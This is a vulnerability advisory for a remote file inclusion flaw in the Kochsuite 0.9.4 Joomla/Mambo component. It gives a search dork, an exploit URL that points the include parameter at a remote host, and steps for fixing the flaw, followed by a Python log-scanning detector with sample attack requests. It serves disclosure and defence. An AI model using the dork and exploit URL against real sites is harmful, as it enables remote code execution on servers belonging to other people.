.:[ insecurity research team ]:.
.__..____.:.______.____.:.____ .
.:. | |/ \:/ ___// __ \:/ _\.:.
: | | | \\____\\ ___/\ /__ :. .
..: |__|___| /____ >\___ >\___ >.:
.:.. .. .\/ .:\/:. .\/. .:\/:
. ...:. .advisory. .:...
:..................: 18.o8.2oo6 ..

Affected Application: Kochsuite v0.9.4 (Mambo/Joomla CMS Component)

. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

Discovered by: camino
Team: Insecurity Research Team
URL: http://www.insecurityresearch.org
E-Mail: camino[at]sexmagnet[dot]com

. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .

Type: Remote [x] Local [ ]
Remote File Inclusion [x] SQL Injection [ ]
Level: Low [ ] Middle [x] High [ ]
Application: Kochsuite
Version: 0.9.4
Vulnerable File: config.kochsuite.php
URL: http://www.vegisto.com
Description: A Mambo/Joomla component that lets chefs publish their content.
Dork: inurl:"com_kochsuite"

. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://huh?

. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .

o1.) open config.kochsuite.php

o2.) take a look at line 46, where the direct-access guard has been commented out, so the file can be requested on its own:

# Don't allow direct linking defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

o3.) take a look at line 47, which builds the include path from $mosConfig_absolute_path, the value a direct request can supply (see the exploit section):

require_once ($mosConfig_absolute_path.'/administrator/components/com_kochsuite/includes/letters.inc');

o4.) change line 46 so the guard is active again (remove the comment marker):

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

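A detection check for the request pattern in the exploit section, added here as an example (it is not part of this advisory and not Kochsuite code): it scans web server access logs in the Apache/nginx "combined" format for requests to config.kochsuite.php whose mosConfig_absolute_path parameter names a remote location. The sample log lines, client addresses and the list of remote schemes are constructed assumptions.

```python
"""Scan access-log lines for the RFI request shape described in the advisory."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" log format (assumed): client, timestamp, request, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

VULN_FILE = "/administrator/components/com_kochsuite/config.kochsuite.php"
PARAM = "mosConfig_absolute_path"
# Schemes that make require_once load code from elsewhere. php:// and data://
# stream wrappers are an assumption added beyond the advisory's http:// case.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data"}


def is_remote_include(value: str) -> bool:
    """True when the parameter value points outside the local filesystem."""
    v = unquote(value).strip()
    return urlsplit(v).scheme.lower() in REMOTE_SCHEMES or v.startswith("//")


def find_rfi_attempts(lines):
    """Return (ip, timestamp, injected value, status) for each matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; ignore it
        path, _, query = m.group("target").partition("?")
        if not path.lower().endswith(VULN_FILE):
            continue
        # parse_qs decodes percent-encoding and handles repeated parameters.
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            if is_remote_include(value):
                hits.append((m.group("ip"), m.group("ts"), value, m.group("status")))
    return hits


# Constructed sample traffic: one benign request, the advisory's request shape,
# and a percent-encoded variant against a sub-directory install.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Aug/2006:10:00:01 +0200] "GET /index.php?option=com_kochsuite HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Aug/2006:10:00:02 +0200] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://huh? HTTP/1.1" 200 311',
    '198.51.100.7 - - [18/Aug/2006:10:00:03 +0200] "GET /joomla/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=https%3A%2F%2Fexample.net%2Fs HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for ip, ts, value, status in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} RFI attempt: {PARAM}={value} (status {status})")
```

A local path such as /var/www/joomla is not flagged, so the check reports only values that would make the include reach off the host.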
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .

my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)